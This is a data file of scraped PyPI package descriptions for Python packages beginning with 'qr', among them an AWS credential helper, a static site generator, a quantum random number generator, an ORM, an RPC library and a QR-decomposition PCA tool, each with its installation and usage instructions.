keys:qrmr refreshBe cool:aws s3 lsREMEMBER:set environment variable AWS_PROFILE in your shell or virtualenv to\nmake life easier:export AWS_PROFILE=iam_user_nameFind out more features by running:qrmr--helpFind us on:https://gitlab.com/qrmr/qrmrResources:https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.htmlLicense / Copyright / Disclaimer:(c)Copyright 2017 - 2018, all rights reserved by QRMR / ALDG / Alexander L. de Goeij.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \u201cAS\nIS\u201d AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\nPARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\nHOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED\nTO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\nPROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."} +{"package": "qrn", "pacakge-description": "QRN: A simple, highly opinionated static site generatorQRN is a static site generator that is as simple as I can make\nit while still being useful. QRN assumes that most of your content\nis in markdown format, that you are using sass/scss or plain old css\nfor styling. 
QRN is also geared towards modest sized content, the\nkind of thing you might find in a personal blog.QRN also supports a simple but flexible layout/templating system\nthat let's you specify a standard HTML \"frame\" around your content\nand also embed executable Python code in the content.A key feature of QRN is that it has very few external dependencies.\nQRN is written in a fairly generic Python 3 and requires:The PyYAML Python library.An external program that turns markdown into HTML (currently pandoc).And external program that turns scss/sass into css (currently sass).That's it. What this means is that QRN is easy to set up and\n(I hope) will continue to work over time as libararies and packages\nchange.What does QRN mean?Ham radio operators use ashorthand codethat has its origins in the early days of telegraphy. QRN is the code that means\n\"I am troubled by static noise.\"Using QRNQRN works like most static site generators: You prepare a directory with\nroughly the content you want to show up in your final site. When you run\nQRN it transforms your source content into a final output site that you can\nthen deploy. The value of QRN is that it performs various transformation as\nit does the copying:QRN knows how to tranform markdown files into html.QRN knows how to do \"include\" processing on your content so\nthat you can write the common parts of your site once.The key idea behind QRN is that it is extremely opinionated about a few\nthings -- mostly around a some key naming conventions and how those\nfiles are processed into your final static webstite.Specifically:QRN wants you to put the source for your site under a directory calledsrc.QRN generally ignores files and directories whose names start with an underbar (.e.g.src/_save).QRN wants you to put the source for all included files and layouts (see below) insrc/_layouts.When you run QRN it will put the resulting processed, read-to-go site in a directory calledbuild.QRN will run all files with a.htmlor.xmlextension through theepyprocessor (see below).QRN will run all files with a.hamlextension through thepamlprocessor (see below).QRN will run all files with a.mdextension through theepyprocessor and then convert it to HTML.QRN will run all files with a.sassor.scssextension through thesassprocessor.Otherwise, QRN will just copy files fromsrctobuild.File headers and layouts.In general, QRN will recognize YAML headers at the beginning of .md, .html, .xml and .haml files. The headers\nare set off from the file content with three dashes:---\ntitle: A simple html file.\ndate: klsdfklj\n---\n\n \n A simple html file.\n \nThe EPy ProcessorAs mentioned above, QRN runs .md, .html and .xml files through the Embedded Python (or EPy) processor.\nEPy allows you to embed code that is evaluated at site build time in your content.\nEPy uses the commontext <%= some_code() %> more textsyntax, reminencent ofEmbedded Ruby. Specifically:<%= some_code() %>will insert the result of evaluating the Python code into the text. Thus1 <%= 100/50 %> 3will result in1 2 3.<%! other_code() !%>will simply evaluate the Python code and ignore the result.Python's indentation based approach to syntax presents a special challenge to EPy: Requiring significant whitespace\nin embedded code would be error prone and confusing. Instead, EPy strips off leading whitespace and relies on the\ntraining:'s to open code blocks and a special <%! end %> directive to close them. Here, for example is a\nloop in EPy:<%! for x in range(1): %>\nThe number is <%= x %>\n<%! 
end %>And anifstatement in EPy:<%! count = 0 %>\n<%! if count: %>\nThe count is non-zero.\n<%! else: %>\nThe counts is zero.\n<%! end %>Note that the<%! end %>does not appear in the actual Python code. It\nis just a marker that theiforforhas ended.The Paml ProcessorSimilarly, QRN includes a \"Paml\" processor. Paml is like Haml, but it uses Python\nin place of Ruby. Other than that syntax is more or less Haml. Here's an example:---\nkind: partial\n---\n.twelve.columns\n %ul.menu\n %li.menu\n %a{\"href\": \"/index.html\"} Contents\n %li.menu\n %a{\"href\": \"/credit.html\"} Credits\n %li.menu\n %a{\"href\": \"/license.html\"} License\n %li.menu\n %a{\"href\": \"/205-0.txt\"} Original File"} +{"package": "qrnet", "pacakge-description": "qrnetA simple command-line tool to generate QR codes for Wi-Fi credentials.InstallationInstallqrnetusing pip:pip install qrnetUsageTo generate a QR code for your Wi-Fi:qrnet [-f filename.png]ArgumentsSSID: The SSID of your Wi-Fi network.Password: The password for your Wi-Fi network.Encryption Type: Choose from WEP, WPA, or WPA2.filename (optional): Specify the filename for the QR code image. If not provided, the default iswifi_qr.png.ContributingPull requests are welcome."} +{"package": "qrng", "pacakge-description": "qRNGis an open-source quantum random number generator written in python. It achieves this by using IBM'sQISKitAPI to communicate with any one of their publicly accessible quantum computers:ibmq_armonk1 qubitibmq_london5 qubitsibmq_burlington5 qubitsibmq_essex5 qubitsibmq_ourense5 qubitsibmq_vigo5 qubitsibmqx25 qubitsibmq_qasm_simulator32 qubits (simulated)qasm_simulator8 qubits (simulated)Note that you need to input your IBMQ API token (make an IBMQ accounthere) to access any of these quantum computers/simulators, except forqasm_simulatorwhich can be accessed locally via the instructions below.InstallationYou can use the pip package manager to install thecurrent releaseof qRNG (along with its dependencies):pip install qrngUpgrading is as simple as:pip install qrng -UTutorialNow you can try generating your first random number. First open python in the shell or use an IDE:$pythonNow let's connect qRNG to our IBMQ account and generate some numbers:>>>importqrng>>>qrng.set_provider_as_IBMQ('YOUR_IBMQ_TOKEN_HERE')#the IBMQ API token from your dashboard>>>qrng.set_backend('ibmq_london')#connect to the 5 qubit 'ibmq_london' quantum computer>>>qrng.get_random_int32()#generate a random 32 bit integer3834878552>>>qrng.get_random_float(0,1)#generate a random 32 bit float between 0 to 10.6610504388809204If you don't need or want to use IBM's actual quantum computers, you can instead just use the default backend like so:>>>importqrng>>>qrng.set_provider_as_IBMQ('')#empty string denotes local backend which can only use 'qasm_simulator'>>>qrng.set_backend()#no args defaults to `qasm_simulator`>>>qrng.get_random_int64()#generate a random 64 bit integer10110319200202513540>>>qrng.get_random_double(0,1)#generate a random 64 bit double between 0 to 10.9843570286395331What is Random Number Generation?There are a variety of applications that require a source of random data in order to work effectively (e.g. simulations and cryptography). To that end, we make use of random number generators (RNGs) to generate sequences of numbers that are, ideally, indistinguishable from random noise.There are two types of RNGs: Pseudo-RNGs (PRNGs) and True RNGs (TRNGs). 
Pseudo-RNGs, while not truly and statistically random, are used in a variety of applications as their output is 'random enough' for many purposes. For a True RNG, however, an actual piece of hardware is required to measure some random process in the real world, as no computer program could suffice due to being deterministic in nature. These devices vary from apparatuses that measure atmospheric noise to pieces of radioactive material connected via USB.Why Quantum? Modern physics has shown us that there are really only two types of events that can happen in the universe: the unitary transformation of a quantum system, and quantum wavefunction collapse (i.e. measurement). The former is a totally deterministic process and the latter a random one. Indeed, all randomness in the universe (as far as we know) is the result of the collapse of quantum systems upon measurement. In a sense, this is randomness in its purest form and the underlying source of it in any TRNG.The point of this package, then, besides it being a fun side project, is to cut out the middleman entirely, whether it be a radioactive isotope or the thermal noise in your PC, and simply measure an actual quantum system. For example, we can prepare an equal superposition of |0> and |1> in a quantum computer. There is a 50-50 chance of measuring this state as a 0 or 1, and we can continually iterate this process for as many random bits as we require. Note that while such a simple algorithm doesn't require a full-blown quantum computer, there are some random algorithms that do.Practicality Of course, while the numbers generated from a quantum computer are amongst the most random, the practicality of connecting to one of IBM's quantum computers to generate a large amount of these numbers is nonexistent. For most real-world use cases that require such high-caliber random numbers, an off-the-shelf hardware RNG would suffice. The purpose of this package is thus to provide a working example of how a real cloud-based quantum random number generator may operate."}
{"package": "qrnn", "pacakge-description": "No description available on PyPI."}
{"package": "qrnr", "pacakge-description": "No description available on PyPI."}
{"package": "qr-obelix", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qrogue", "pacakge-description": "_______ \n / _____ \\ \n | | | | \n | | | | \n | | | | _ __ ___ __ _ _ _ ___ \n | | | | | '__/ _ \\ / _` | | | |/ _ \\\n | |_____| | | | | (_) | (_| | |_| | __/ \n \\______\\_\\ |_| \\___/ \\__, |\\__,_|\\___| \n __/ | \n |___/ASCII-Art generated byhttps://www.ascii-art-generator.org/Qrogue v0.7.0Qrogue is a modernized Quantum Computing take of the classical gameRogue.You will play as a student whose dream is to travel through the galaxy.\nAs they hear about \"Mission Quniverse\" they immediately apply for its\ntraining program to be able to join this fascinating Quantum Computing\npowered universe exploration mission.Table of ContentsInstallationDependenciesLinuxWindowsNotesHow to play - ControlsOutlookInstallationDependenciespy_cui 0.1.4qiskit 0.34.2numpy 1.20.3antlr4-python3-runtime 4.10However, these dependencies are installed automatically if you install Qrogue via pip.Linux/macOSPrerequisitesPython 3.8pipFor Linux/macOS you simply have to runpipinstallqrogueto install Qrogue in your current Python environment.Afterwards you can launch the game simply by executingqroguein the Python environment you installed Qrogue in.WindowsPrerequisitesSame as for Linux/macOSNotespy_cui.errors.PyCUIOutOfBoundsErrorShould you ever encounter this error\nwhen starting the game please try to maximize the console you\nuse for playing. This is because currently there is no automatic\nfont size adaption so depending on your console settings a\nminimum width and height is required. Alternatively or if\nmaximizing doesn't help you can also lower the font size of the\nconsole.newer Python versionsUsually also Python 3.9 should perfectly work for\nplaying Qrogue but testing is currently done for Python 3.8 so\nthere is no official support yet for other versions. The same\nis true if you decide to manually install the dependencies; newer\nversion will likely work but are not recommended.\nPython 3.10 is not yet supported due to changes in import locations.How to play - ControlsNavigate in menus: Arrow Keys, wasdMove in game world: Arrow Keys, wasdScroll in popup: Arrow Keys, wasdClose popup: Space, EnterReopen last popup: HSelect answer in question popup: horizontal Arrow Keys, adConfirm selection (also in question popup): Space, EnterCancel/back: Shift+A, Shift+Left, BackspacePause: P, TabSituationalshortcut keys: 0-9Debug Keys (not for use in normal play through!)Print screen: CTRL+PForce re-render: CTRL+RFeedbackWe'd be very happy if you share any feedback with us, regardless whether you liked the game or not.\nJust send it via Email tomichael.artner@jku.atwith the subject \"Qrogue Feedback\".\nIt would also be nice if you could add your user-data folder (\"qrogue/QrogueData\", for normal installations it can be found in your virtual environment's packages) with the log files. Thanks!If you find a typo: In the title of the popup window you should find something like \"{@abc}\" where abc is the message id.\nPlease do tell us the message id so we have an easier time fixing it. 
Thanks!Outlook"} +{"package": "qronos-client", "pacakge-description": "qronos-clientPython client for QRonosInstallationThis package can be installed via pip:pip install qronos-clientExample UsageAuthenticationfromqronosimportQRonosClient# Create client and loginqronos=QRonosClient(host='https://dev.qronos.xyz')token,expiry=qronos.login(username='Quentin',password='Rogers')# Alternatively, if you already have a tokenqronos=QRonosClient(host='https://dev.qronos.xyz',token='ABCDEFGHIJKLMN')# Logoutqronos.logout(all_tokens=True)Tracker (Item) Data Import# Import Tracker (Item) Datajob_id=qronos.tracker_import(tracker_id=24,unique_columns=[\"Part Number\",\"Weight\"],can_add_item=True,can_delete_item=False,data=[{\"Part Number\":\"A1\",\"Weight\":5},{\"Part Number\":\"A2\",\"Weight\":8}],)Stage Data Import# Import Stage Datajob_id=qronos.stage_import(stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)Stage Data Import by Tracker Stage# Import Stage Datajob_id=qronos.stage_import(tracker_stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)Import Status# Check Status of an Importstatus=qronos.import_status(job_id=job_id)Delete Items# Delete Itemsjob_id=qronos.delete_items(tracker_id=2,data=[\"A\",\"B\"],)Paginated servicesTheget_item_attributes,get_item_stages,get_item_stage_historyandget_all_item_attribute_historyservices return paginated responses in the form:{\"next\":\"http://127.0.0.1:8000/api/attributes/?cursor=cD0x&page_size=1\",\"previous\":null,\"items\":[{},...]}Thenextandpreviousfields contain the API url for the next/previous pages respectively.\nIf there are no next or previous pages the value would benull.All items can be returned as a single list of items by theget_all_item_datamethod.Following are some usage examples for theget_item_attributesservice. Pagination works the same way for all the services. I.e. you can use the same example by just changing the name of the service.# Request the first page of datadata=qronos.get_item_attributes(tracker=3,page_size=2,)# Request the next page. This will use the same page_size as the previous request.data=qronos.get_item_attributes(tracker=3,page=data.get(\"next\"))# Request the next next page. 
Use page_size to change the size of the page.data=qronos.get_item_attributes(tracker=3,page=data.get(\"next\"),page_size=10,)# Request the previous pagedata=qronos.get_item_attributes(tracker=3,page=data.get(\"previous\"))# Requesting all the pages using a while loopall_data=[]data=qronos.get_item_attributes(tracker=3,page_size=10)all_data.extend(data.get('items'))whilenextp:=data.get('next'):data=qronos.get_item_attributes(tracker=3,page=nextp)all_data.extend(data.get('items'))Get Item Attribute DataAt minimum you must request atrackeror aunique_key/unique_keysYou cannot request both aunique_keyandunique_keysUsepage_sizeto change the size of the paginated resultUsepageto navigate to next/previous page# Get Item Attribute Data by trackeritem_data=qronos.get_item_attributes(tracker=3,show_non_mastered=False,show_mastered=True,)# Get Item Attribute Data by unique keysitem_data=qronos.get_item_attributes(unique_keys=[\"800000689\",\"800000726\",\"800000727\"],show_non_mastered=True,show_mastered=True,)# Get Item Attribute Data by single unique keyitem_data=qronos.get_item_attributes(unique_key=\"800000689\",show_non_mastered=False,show_mastered=True,)# Get Item Attribute Data by single unique key for only a single trackeritem_data=qronos.get_item_attributes(unique_key=\"800000689\",tracker=4,show_non_mastered=False,show_mastered=True,)Get Item Stage DataAt minimum you must request atrackeror aunique_key/unique_keysYou cannot request both aunique_keyandunique_keysYou cannot request both astageandstagesYou cannot request both atracker_stageandtracker_stagesYou cannot request a combinations ofstageandtracker_stagefieldsUsepage_sizeto change the size of the paginated resultUsepageto navigate to next/previous page# Get Item Stage Data for a trackerstage_data=qronos.get_item_stages(tracker=3)# Get Item Stage Data by unique keysstage_data=qronos.get_item_stages(unique_keys=[\"800000689\",\"800000726\",\"800000727\"])# Get Item Stage Data by single unique key but only for a single stagestage_data=qronos.get_item_stages(unique_key=\"800000689\",stage=54,)# Get Item Stage Data by single unique key but only for a single tracker stagestage_data=qronos.get_item_stages(unique_key=\"800000689\",tracker_stage=12,)# Get Item Stage Data for a list of stages on a certain trackerstage_data=qronos.get_item_stages(tracker=4,stages=[54,55,56],)# Get Item Stage Data for a list of tracker stages on a certain trackerstage_data=qronos.get_item_stages(tracker=4,tracker_stages=[12,13,14],)Get Item Stage History DataGet the history of changes to ItemStages.\nRequest follow the same pattern as for Get Item Stage with the addition of the following options:# Get changes between a start and end date on a particular trackerstage_history_data=qronos.get_item_stage_history(tracker=4,interval_start_date=\"2020-12-25\",# using ISO-8601 format (YYYY-MM-DD)interval_end_date=\"2021-12-25\",)# Get ItemStageHistory for the changes to the \"actual\" and \"leadtime\" fields of ItemStages on a particular trackerstage_history_data=qronos.get_item_stage_history(tracker=4,fields=[\"actual\",\"leadtime\"])Get All Data MethodsThese methods will loop through eachpageand aggregate the data into a single list of items.get_all_item_attributesget_all_item_stagesget_all_item_stage_historyget_all_item_attribute_history# Get all Item Attribute Data for a trackerattributes_data=qronos.get_all_item_attributes(tracker=3)# Get all Item Stage Data for a trackerstage__data=qronos.get_all_item_stages(tracker=3)# Get all Item Stage History Data for a 
trackerattribute_data=qronos.get_all_item_stage_history(tracker=3)# Get all Item Attribute History Data for a tracker & attributesattribute_history=qronos.get_all_item_attribute_history(tracker=4,attribute_names=[\"Attribute A\",\"Attribute B\"],page_size=500,)TestingPlease speak with a QRonos Demo Site Admin for credentials in order to run the tests."} +{"package": "qronos-django", "pacakge-description": "qronos-djangoDjango package for using the QRonos Python ClientInstallationThis package can be installed via pip:pip install qronos-djangoAdd to yourINSTALLED_APPS:INSTALLED_APPS=[...\"qronos_django\",...]Required SettingsQRONOS_HOSTDefault:\"dev.qronos.xyz\"The URL host of the QRonos instance.QRONOS_USERDefault:\"\"The username with which to authenticate.QRONOS_PASSWORDDefault:\"\"The password with which to authenticate.Optional SettingsQRONOS_TOKEN_CACHE_KEYDefault:\"QRONOS_TOKEN\"The name of the cache key for TokensQRONOS_TOKEN_CACHE_FRACTIONDefault:0.8What fraction of the total lifetime of tokens to cache. Set to 0 to disable Token caching.QRONOS_LOGGINGDefault:TrueCreate QRonosImportLog items in the Database to track the triggered QRonos ImportsQRONOS_ID_LOGGINGDefault:FalseStore the tracker/stage ID's in the QRonosImportLog itemsQRONOS_DATA_LOGGINGDefault:FalseStore the data sent in the QRonosImportLog itemsExample Usagefromqronos_django.importsimporttracker_import,stage_import,delete_itemsfromqronos_django.tasksimportupdate_qronos_log_status# Import Tracker (Item) Data# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=tracker_import(tracker_id=24,unique_columns=[\"Part Number\",\"Weight\"],can_add_item=True,can_delete_item=False,data=[{\"Part Number\":\"A1\",\"Weight\":5},{\"Part Number\":\"A2\",\"Weight\":8}],)# Import Stage Data# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=stage_import(stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)# Import Stage Data by Tracker Stage# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=stage_import(tracker_stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)# Delete Items# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=delete_items(tracker_id=2,data=[\"A\",\"B\"],)# Update (and return) status of a single QRonos Import Log. 
Can pass optional qronos parameter if you already have a QRonosClient object.status=import_log.update_import_status()# (Async) Update Status of a set of QRonos Import Logs (note use QRonosImportLog ids, not job ids)update_qronos_log_status.delay([125,233])"} +{"package": "qrookDB", "pacakge-description": "InitializingThis package represents a new ORM to work with SQL-syntax databases (for now, only PostgreSQL and SQLite are natively supported,\nbut you may inherit your own connectors from IConnector abstract class).To start working, all you need to do is import a package's facade object and initialise it:importqrookDB.DBasDBDB=DB.DB('postgres','db_name','username','password',format_type='dict')DB.create_logger(app_name='qrookdb_test',file='app_log.log')DB.create_data(__name__,in_module=True)Here we first created a database connection, providing connect parameters (format_type defines the form\nin which results'll be returned - 'list' and 'dict' supported),\nthen initialized an internal logger to write both in console and file.\nNote that instead of 'postgres' you could've sent the instance of the connector (including your own connectors).\nThe 'create_data' function reads database system tables to get info about all user-defined tables,\nand creates QRTable objects based on this info. Now you can use table names (ones given to them in database)\nto access to these objects as DB instance fields (also, configuration showed above adds these table names to\nyour current module, so you can use short names: 'books' instead of 'DB.books').QueryingYou can form execute queries using either DB instance or concrete tables (in this case, you don't need to\nmention in which table to perform queries). To execute any query, use one of 'exec', 'one' and 'all' methods\n(latter two define how many rows to return from query; 'exec' returns None by default). If forming of the query\nfails, it won't be executed at all (and will return None if you try); you can use 'get_error' method of the query\nto get the error description (it will be logged, though). 
Note: if error occured in the middle of query-building,\nquery will ignore the rest of building proccess.Select queries examplesop=DB.operatorsprint(DB.books)print(books,books.id)# logical 'and' is used by default for multiple where conditions; 'op' module contains special operatorsdata=DB.select(books).where(original_publication_year=2000,language_code='eng').where(id=op.In(470,490,485)).all()# you can add raw-string query parts, but it'll be on your conscience in terms of securityquery=books.select('count(*)').group_by(books.original_publication_year)data=query.all()data=DB.select(books,books.id).where('id < 10').order_by(books.id,desc=True).limit(3).offset(2).all()# here fields have same name ('id'), but via different tables it'll be ok# (for data in dict-format, table-names'll be added to keys)data=books.select(authors.id,books.id).join(books_authors,op.Eq(books_authors.book_id,books.id)).join(authors,op.Eq(books_authors.author_id,authors.id)).all()# .join(books_authors, 'books_authors.book_id = books.id')data=books.select(books.id).where(id=1).where(bool='or',id=2).all()# error - trying to select two equal fields;q=DB.select(events,events.id,events.id).where(id=1)data=q.all()print('data is None here:',data,';\terror:',q.get_error())Update, Insert, Delete queries examples# if auto_commit is not set, you'll have to commit manuallyok=DB.delete(events,auto_commit=True).where(id=1).exec()fromdatetimeimportdatetimet=datetime.now().time()d=datetime.now().date()ok=DB.update(events,auto_commit=False).set(time=t).where(id=6).exec()DB.commit()# other possible variants for values: values([t]), values([d, t])# other possible variants for returning: returning(events.date, events.time), returning(['date', 'time']), returning('date', 'time')query=events.insert(events.date,events.time,auto_commit=True).values([[d,t],[None,t]]).returning('*')data=query.all()# you can also execute fully-raw queries; if you need to return values,use'config_fields'todefineresults' names (not necessary for 'list' data format)data=DB.exec('select * from get_book_authors(1) as f(id int, name varchar)').config_fields('id','name').all()print(data)Table's meta-dataUsing this package you can easily discover your database. DB instance provides information\nabout table's name, its columns (with their name and type) and info about primary and\nforeign keys. 
Example of function which prints all info about existing tables is shown below.defprint_tables():tables=DB.meta['tables']fortable_name,tableintables.items():meta=table.metaprint(f\"===---{meta['table_name']}---===\")forfield_name,fieldinmeta['fields'].items():pk_flag=field.primary_keyisTrue# or field == meta['primary_key']print(f\"{'(*)'ifpk_flagelse' '}{field.name}:{field.type}\")iflen(meta['foreign_keys']):print('Constraints:')forfields_with_fkinmeta['foreign_keys']:fk=fields_with_fk.foreign_keyprint(f'\tForeign key:{fields_with_fk.name}references{fk.table.meta[\"table_name\"]}({fk.name})')and the result can be:===---publications---===book_id:integerisbn:bigint(*)id:integercreated_at:timestampwithtimezoneisbn13:bigintlanguage_code:charactervaryingpublication_year:smallintinfo:jsonbupdated_at:timestampwithtimezone\nConstraints:Foreignkey:book_idreferencesbooks(id)"} +{"package": "qroundprogressbar", "pacakge-description": "UNKNOWN"} +{"package": "qroutes", "pacakge-description": "Simple Compujure/Ring library for WSGI.Learn more"} +{"package": "qrovkbwaun", "pacakge-description": "Qrovkbwaun=================This API SDK was automatically generated by [APIMATIC Code Generator](https://apimatic.io/).This SDK uses the Requests library and will work for Python ```2 >=2.7.9``` and Python ```3 >=3.4```.How to configure:=================The generated code might need to be configured with your API credentials.To do that, open the file \"Configuration.py\" and edit its contents.How to resolve dependencies:===========================The generated code uses Python packages named requests, jsonpickle and dateutil.You can resolve these dependencies using pip ( https://pip.pypa.io/en/stable/ ).1. From terminal/cmd navigate to the root directory of the SDK.2. Invoke ```pip install -r requirements.txt```Note: You will need internet access for this step.How to test:=============You can test the generated SDK and the server with automatically generated testcases. unittest is used as the testing framework and nose is used as the testrunner. You can run the tests as follows:1. From terminal/cmd navigate to the root directory of the SDK.2. Invoke ```pip install -r test-requirements.txt```3. Invoke ```nosetests```How to use:===========After having resolved the dependencies, you can easily use the SDK following these steps.1. Create a \"qrovkbwaun_test.py\" file in the root directory.2. 
Use any controller as follows:```pythonfrom __future__ import print_functionfrom qrovkbwaun.qrovkbwaun_client import QrovkbwaunClientapi_client = QrovkbwaunClient()controller = api_client.clientresponse = controller.get_basic_auth_test()print(response)```"} +{"package": "qrpc", "pacakge-description": "# Features* Easy registration of methods* Custom Exception and Options* Includes plenty testing helpers# InstallationOn most systems, its a matter of```bashpip install qrpc```# Quickstart## A Simple ExampleThis is a realy simple example of how to create your own API using QRpc### Server```pythonfrom qrpc.server import Serverserver = Server()@server.registe(\"service1/hello\")def hello(name=None):if name:return \"hello \" + namereturn \"hello anonymous\"@server.registe(\"service1/add\")def add(x, y):return x + yserver.run('127.0.0.1', 8080)```### Client```pythonfrom qrpc.client import RpcClientfrom qrpc.client import ServerProxyserver = ServerProxy('http://localhost:8080/v1/batch')rpc = RpcClient(server=server)result = rpc.service1.hello.call(name='ycc')print(result.data)```# Core content## Request## Response(Result)The response of an rpc request has three attributes that user should concern, rpc_code, data, message.The rpc_code indicates if the rpc request has been successfully received, understood, and accepted. 0 and all the positive numbers are **reserved code**, and can't be used by user.The data is the result of an rpc method.The message provides some helpful information.## ExceptionsYou can define an RPCException and raise it when you want to tell the caller there is something wrong in some rpc method. For example a division rpc method and the second argument of a division is zero.```python# serverfrom qrpc.exceptions import RPCFaultException@server.registe(\"service/div\")def test_div(x, y):if y == 0:raise RPCFaultException(code=99, # Use any code in your as you like except reserved code.message=\"ZeroDivisionError: integer division or modulo by zero\")return x / y# clientdiv_result = rpc.service.div.call(x=1, y=0)```The QRpc will catch the exception and wrap it in reponse.#Lazy Call and EvaluationRPC call are lazy--the act of creating an rpc call doesn't send the network request to server. You can stack call together all day long, and the framework won't actually send the network request until one of the calls is evaluated. You can get detail from the following example:```pythonadd_result = rpc.service.add.call(x=1, y=2)dict_result = rpc.service.dictionary.call(dictionary={\"test_key\": \"test_value\"})hello_result = rpc.service.hello.call(name='world')print (add_result.data) # only one network requestprint (dict_result.data)print (hello_result.data)```Though this looks like sending three rpc call request, in fact it only send one network request, at the \"add_result.data\" line. An rpc call is just added into a job list when it is constructed. The real network request will be executed when any of the 'rcp call' in the job list is evaluated. The framework evaluates all the rpc call in the job list at one time. So only send one network request.You can evaluate an rpc call by get any attribute of the rcp result.In the last example, there are three rpc calls in the job list. 
The three rpc calls are evaluated at one network request when you get the data of add_result.So dict_result.data or hello_result.data won't cause any network request.In general, the result of an rpc call isn't fetched from the server until you ask them.# Adcanced Usage# TODO"} +{"package": "qrpca", "pacakge-description": "QRPCAqrpca works similarly to sklean.decomposition, but employs a QR-based PCA decomposition and supports CUDA acceleration via torch.How to installqrpcaTheqrpcacan be installed by the PyPI and pip:pip install qrpcaIf you download the repository, you can also install it in theqrpcadirectory:git clone https://github.com/xuquanfeng/qrpca\ncd qrpca\npython setup.py installYou can access it by clicking onGithub-qrpca.UsageHere is a demo for the use ofqrpca.The following are the results of retaining principal components containing 95% of the information content by principal component analysis.You can set the parametern_componentsto a value between 0 and 1 to execute the PCA on the corresponding proportion of the entire data, or set it to an integer number to reserve then_omponentscomponents.import torch\nimport numpy as np\nfrom qrpca.decomposition import qrpca\nfrom qrpca.decomposition import svdpca\n\n# Generate the random data\ndemo_data = torch.rand(60000,2000)\nn_com = 0.95\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# qrpca\npca = qrpca(n_component_ratio=n_com,device=device) # The percentage of information retained.\n# pca = qrpca(n_component_ratio=10,device=device) # n principal components are reserved.\ndemo_qrpca = pca.fit_transform(demo_data)\nprint(demo_pca)\n\n# SVDPCA\npca = svdpca(n_component_ratio=n_com,device=device)\ndemo_svdpca = pca.fit_transform(demo_data)\nprint(demo_svdpca)Comparision with sklearnThe methods and usage ofqrpcaare almost identical to those ofsklearn.decomposition.PCA. If you want to switch fromsklearntoqrpca, all you have to do is change the import and declare the device if you have a GPU, and that's it.And here's an illustration of how minimal the change is when differentPCAis used:qrpca.decomposition.qrpcafrom qrpca.decomposition import qrpca \ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\npca = qrpca(n_component_ratio=n_com,device=device)\ndemo_qrpca = pca.fit_transform(demo_data)qrpca.decomposition.svdpcafrom qrpca.decomposition import svdpca\npca = svdpca(n_component_ratio=n_com)\ndemo_svdpca = pca.fit_transform(demo_data)sklearn.decomposition.PCAfrom sklearn.decomposition import PCA\npca = PCA(n_components=n_com)\ndemo_pca = pca.fit_transform(demo_data)Performance benchmark sklearnWith the acceleration of GPU computation, the speed of both QR decomposition and singular value decomposition inqrpcais much higher than that insklearnWe run the different PCA methods on data with different numbers of rows and columns, and then we compare their PCA degradation times and plotted the distribution of the times. 
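The benchmark script itself is not part of the package, but a minimal sketch along the following lines (the 1000-column width, the row counts and the 0.95 component ratio are illustrative assumptions, not the authors' exact settings) shows how such a timing comparison can be run with the API documented above:

```python
# Rough timing sketch comparing qrpca (GPU if available) with sklearn's PCA
# on random matrices of increasing height; not the authors' benchmark code.
import time

import torch
from sklearn.decomposition import PCA
from qrpca.decomposition import qrpca

device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")

for n_rows in (10_000, 30_000, 60_000):
    data = torch.rand(n_rows, 1000)

    t0 = time.perf_counter()
    qrpca(n_component_ratio=0.95, device=device).fit_transform(data)
    t_qrpca = time.perf_counter() - t0

    t0 = time.perf_counter()
    PCA(n_components=0.95).fit_transform(data.numpy())
    t_sklearn = time.perf_counter() - t0

    print(f"{n_rows} rows: qrpca {t_qrpca:.2f}s, sklearn {t_sklearn:.2f}s")
```

On a machine without CUDA the device falls back to CPU, so the comparison then reflects the QR-based decomposition alone rather than GPU acceleration.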
